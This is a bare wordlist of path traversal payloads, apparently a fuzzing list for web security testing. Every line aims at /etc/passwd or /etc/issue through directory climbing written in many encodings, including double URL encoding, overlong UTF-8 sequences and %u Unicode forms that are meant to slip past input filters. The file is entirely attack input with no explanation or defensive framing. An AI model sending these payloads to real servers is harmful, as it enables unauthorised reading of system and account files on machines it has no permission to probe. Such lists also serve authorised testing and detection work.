/../etc/passwd
/../etc/issue
/..%5Cetc%5Cpasswd
/..%5Cetc%5Cissue
/..%2fetc%2fpasswd
/..%2fetc%2fissue
/..%5cetc%5cpasswd
/..%5cetc%5cissue
/..0x2fetc0x2fpasswd
/..0x2fetc0x2fissue
/..0x5cetc0x5cpasswd
/..0x5cetc0x5cissue
/..%252fetc%252fpasswd
/..%252fetc%252fissue
/..%255cetc%255cpasswd
/..%255cetc%255cissue
/..%c0%2fetc%c0%2fpasswd
/..%c0%2fetc%c0%2fissue
/..%c0%afetc%c0%afpasswd
/..%c0%afetc%c0%afissue
/..%c0%5cetc%c0%5cpasswd
/..%c0%5cetc%c0%5cissue
/..%c1%9cetc%c1%9cpasswd
/..%c1%9cetc%c1%9cissue
/..%c1%pcetc%c1%pcpasswd
/..%c1%pcetc%c1%pcissue
/..%c0%9vetc%c0%9vpasswd
/..%c0%9vetc%c0%9vissue
/..%c0%qfetc%c0%qfpasswd
/..%c0%qfetc%c0%qfissue
/..%c1%8setc%c1%8spasswd
/..%c1%8setc%c1%8sissue
/..%c1%1cetc%c1%1cpasswd
/..%c1%1cetc%c1%1cissue
/..%c1%afetc%c1%afpasswd
/..%c1%afetc%c1%afissue
/..%bg%qfetc%bg%qfpasswd
/..%bg%qfetc%bg%qfissue
/..%u2215etc%u2215passwd
/..%u2215etc%u2215issue
/..%u2216etc%u2216passwd
/..%u2216etc%u2216issue
/..%uEFC8etc%uEFC8passwd
/..%uEFC8etc%uEFC8issue
/..%uF025etc%uF025passwd
/..%uF025etc%uF025issue
/..%%32%%66etc%%32%%66passwd
/..%%32%%66etc%%32%%66issue
/..%%35%%63etc%%35%%63passwd
/..%%35%%63etc%%35%%63issue
/..%e0%80%afetc%e0%80%afpasswd
/..%e0%80%afetc%e0%80%afissue
/..%25c1%259cetc%25c1%259cpasswd
/..%25c1%259cetc%25c1%259cissue
/..%25c0%25afetc%25c0%25afpasswd
/..%25c0%25afetc%25c0%25afissue
/..%f0%80%80%afetc%f0%80%80%afpasswd
/..%f0%80%80%afetc%f0%80%80%afissue
/..%f8%80%80%80%afetc%f8%80%80%80%afpasswd
/..%f8%80%80%80%afetc%f8%80%80%80%afissue
